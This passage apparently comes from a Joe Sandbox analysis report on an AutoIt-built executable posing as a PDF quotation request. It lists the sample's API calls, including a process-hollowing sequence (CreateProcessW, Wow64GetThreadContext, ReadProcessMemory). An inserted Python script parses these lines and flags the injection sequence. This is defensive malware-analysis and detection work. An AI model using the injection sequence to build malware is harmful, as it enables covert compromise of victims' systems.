                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                    • String ID:
                                                                    • API String ID: 3300667738-0
                                                                    • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                    • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                    • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                                                                    • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue$CloseOpen
                                                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                                                    • API String ID: 1586453840-614718249
                                                                    • Opcode ID: 745ef64aa2fbb9668b51d20dc45e3911ec94e57b8678bed3badf0bc954fa3e05
                                                                    • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                    • Opcode Fuzzy Hash: 745ef64aa2fbb9668b51d20dc45e3911ec94e57b8678bed3badf0bc954fa3e05
                                                                    • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                    APIs
                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                    • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                    • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CreateShow
                                                                    • String ID: AutoIt v3$edit
                                                                    • API String ID: 1584632944-3779509399
                                                                    • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                    • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                    • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                    • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                    APIs
                                                                      • Part of subcall function 032622E8: Sleep.KERNELBASE(000001F4), ref: 032622F9
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03262544
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1301186731.0000000003260000.00000040.00000020.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3260000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileSleep
                                                                    • String ID: BSTMXWRUSQDSRRNWUDE0XHNG3EJFN
                                                                    • API String ID: 2694422964-2950180723
                                                                    • Opcode ID: 18fa8a459333df37cc0c69326f8e8fb4e584a9b8107993eb917bbe681c43583e
                                                                    • Instruction ID: 320a14dc668cc0a4fe8f1c39d59d472aa3f062e7fd6b061bcde2be07fe59c223
                                                                    • Opcode Fuzzy Hash: 18fa8a459333df37cc0c69326f8e8fb4e584a9b8107993eb917bbe681c43583e
                                                                    • Instruction Fuzzy Hash: 04616430D18388DAEF11DBB4C858BDEBB75AF19305F044598E2587B2C1D7F91A88CBA5
                                                                    APIs
                                                                    • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                    • _wcsncpy.LIBCMT ref: 00401C41
                                                                    • _wcscpy.LIBCMT ref: 00401C5D
                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                    • String ID: Line:
                                                                    • API String ID: 1874344091-1585850449
                                                                    • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                    • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                    • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                    • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                    APIs
                                                                    • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                    • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                    • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Close$OpenQueryValue
                                                                    • String ID: Control Panel\Mouse
                                                                    • API String ID: 1607946009-824357125
                                                                    • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                    • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                    • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                    • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 03261AA3
                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03261B39
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03261B5B
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1301186731.0000000003260000.00000040.00000020.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3260000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 2438371351-0
                                                                    • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                    • Instruction ID: 6bdfac76819a324b34a896cd7444da8db539be8e028b3cadabfaf32e63854801
                                                                    • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                    • Instruction Fuzzy Hash: A8620C34A24258DBEB24CFA4C840BDEB376EF58700F1091A9D10DEB294E775AED1CB59
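The three-call listing above (CreateProcessW, then Wow64GetThreadContext with ContextFlags 00010007, then ReadProcessMemory) is the opening of a thread-context injection routine, and the GetTempFileNameW(?,aut,...) call further down is the AutoIt runtime naming its temporary file. The script below is an added example, written for this page and not part of the Joe Sandbox report or the sample: it parses the report's "APIs" lines (copied here from three of the listings; the function labels are ours), decodes the x86 CONTEXT_FLAGS value, and applies two triage heuristics of the editor's own, not Joe Sandbox rules.

```python
import re
from typing import Any, Dict, List, Tuple

# Lines copied from three of this report's "APIs" listings: the
# CreateProcessW / Wow64GetThreadContext / ReadProcessMemory function at
# 0x03261A.., the GetTempFileNameW function at 0x00431E.., and the
# TerminateProcess function at 0x004753.. (a negative control).
REPORT_ENTRIES: List[Tuple[str, str]] = [
    ("func_03261A", """
• CreateProcessW.KERNELBASE(?,00000000), ref: 03261AA3
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03261B39
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03261B5B
"""),
    ("func_00431E", """
• GetTempPathW.KERNEL32(00000104,?), ref: 00431E34
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00431E4C
"""),
    ("func_004753", """
• GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
• TerminateProcess.KERNEL32(00000000), ref: 004753CE
"""),
]

# One report line: optional "Part of subcall function XXXX:" prefix, then
# Api.MODULE(args), ref: ADDR.  LIBCMT entries carry no argument list.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# x86 CONTEXT_FLAGS bits from winnt.h; 00010007 in the report is CONTEXT_FULL.
CONTEXT_FLAGS = {
    0x00001: "CONTEXT_CONTROL",
    0x00002: "CONTEXT_INTEGER",
    0x00004: "CONTEXT_SEGMENTS",
    0x00008: "CONTEXT_FLOATING_POINT",
    0x00010: "CONTEXT_DEBUG_REGISTERS",
    0x00020: "CONTEXT_EXTENDED_REGISTERS",
    0x10000: "CONTEXT_i386",
}


def parse_api_lines(text: str) -> List[Dict[str, Any]]:
    """Turn one APIs listing into dicts with api, module, args (list) and ref."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [a.strip() for a in raw_args.split(",")] if raw_args else [],
            "ref": m.group("ref"),
        })
    return calls


def decode_context_flags(value: int) -> List[str]:
    """Name the CONTEXT_* bits set in a GetThreadContext ContextFlags value."""
    return [name for bit, name in sorted(CONTEXT_FLAGS.items()) if value & bit]


def triage(entries: List[Tuple[str, str]]) -> List[Tuple[str, str, List[str]]]:
    """Editor's heuristics (not Joe Sandbox signatures):
    - CreateProcess + [Wow64]GetThreadContext + Read/WriteProcessMemory in one
      function is the start of a hollowing / thread-context injection routine
      (SetThreadContext and ResumeThread would complete it);
    - GetTempFileNameW with prefix "aut" matches the prefix the AutoIt runtime
      uses for the temporary files it extracts, consistent with the
      >>>AUTOIT SCRIPT<<< marker elsewhere in this report.
    """
    findings = []
    for label, text in entries:
        calls = parse_api_lines(text)
        names = {c["api"] for c in calls}
        if ({"CreateProcessW", "CreateProcessA"} & names
                and {"GetThreadContext", "Wow64GetThreadContext"} & names
                and {"ReadProcessMemory", "WriteProcessMemory"} & names):
            ctx = next(c for c in calls if c["api"].endswith("GetThreadContext"))
            args = ctx["args"]
            flags = (decode_context_flags(int(args[1], 16))
                     if len(args) > 1 and args[1] != "?" else [])
            findings.append((label, "process-hollowing-sequence", flags))
        for c in calls:
            if c["api"] == "GetTempFileNameW" and len(c["args"]) > 1 and c["args"][1] == "aut":
                findings.append((label, "autoit-temp-file-prefix", [c["ref"]]))
    return findings


if __name__ == "__main__":
    for label, rule, detail in triage(REPORT_ENTRIES):
        print(f"{label}: {rule} {detail}")
```

Run as-is it reports the injection routine at 0x03261A.. with CONTEXT_FULL decoded and the AutoIt temp-file call at 0x00431E4C; the TerminateProcess function stays silent. To use it on a whole report, paste each function's "APIs" listing as one entry; the hollowing rule is deliberately loose (three calls, not the full sequence) so that split routines like the one above are not missed.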
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                    • String ID:
                                                                    • API String ID: 2782032738-0
                                                                    • Opcode ID: d8ae21c13c021e62aa76494794d103b2c936eccb4f68827660fccbfed6d63495
                                                                    • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                    • Opcode Fuzzy Hash: d8ae21c13c021e62aa76494794d103b2c936eccb4f68827660fccbfed6d63495
                                                                    • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                    APIs
                                                                      • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                                    • _free.LIBCMT ref: 004295A0
                                                                      • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                      • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                      • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                                      • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                                      • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                                      • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                                    • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\Quotation request -30112024_pdf.exe
                                                                    • API String ID: 3938964917-4220473358
                                                                    • Opcode ID: 2f9ae14d77bbf766ff9b4e376899c75dd6e4a1bb155ade5769143cf33dfc50f0
                                                                    • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                                                    • Opcode Fuzzy Hash: 2f9ae14d77bbf766ff9b4e376899c75dd6e4a1bb155ade5769143cf33dfc50f0
                                                                    • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: Error:
                                                                    • API String ID: 4104443479-232661952
                                                                    • Opcode ID: 0dca5eb63b397adb51b239d8a9923d05ad9c11b176ecbb19213fdb016a3a367d
                                                                    • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                    • Opcode Fuzzy Hash: 0dca5eb63b397adb51b239d8a9923d05ad9c11b176ecbb19213fdb016a3a367d
                                                                    • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                    APIs
                                                                    • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,0040F545,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,004A90E8,C:\Users\user\Desktop\Quotation request -30112024_pdf.exe,?,0040F545), ref: 0041013C
                                                                      • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                      • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                      • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                      • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                      • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                      • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                    • String ID: X$pWH
                                                                    • API String ID: 85490731-941433119
                                                                    • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                    • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                    • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                    • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock_memmove
                                                                    • String ID: EA06
                                                                    • API String ID: 1988441806-3962188686
                                                                    • Opcode ID: 280269e25119450008068f00ad9edd5e8afa750bad36086ed969abcc4da80e9d
                                                                    • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                    • Opcode Fuzzy Hash: 280269e25119450008068f00ad9edd5e8afa750bad36086ed969abcc4da80e9d
                                                                    • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                    Strings
                                                                    • C:\Users\user\Desktop\Quotation request -30112024_pdf.exe, xrefs: 00410107
                                                                    • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _strcat
                                                                    • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\Quotation request -30112024_pdf.exe
                                                                    • API String ID: 1765576173-569545537
                                                                    • Opcode ID: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                                    • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                                                    • Opcode Fuzzy Hash: afbcd64a5de9b9cf0401a7756764eed502eca04e8b93ddfb1cf174919bef9872
                                                                    • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00431E34
                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00431E4C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
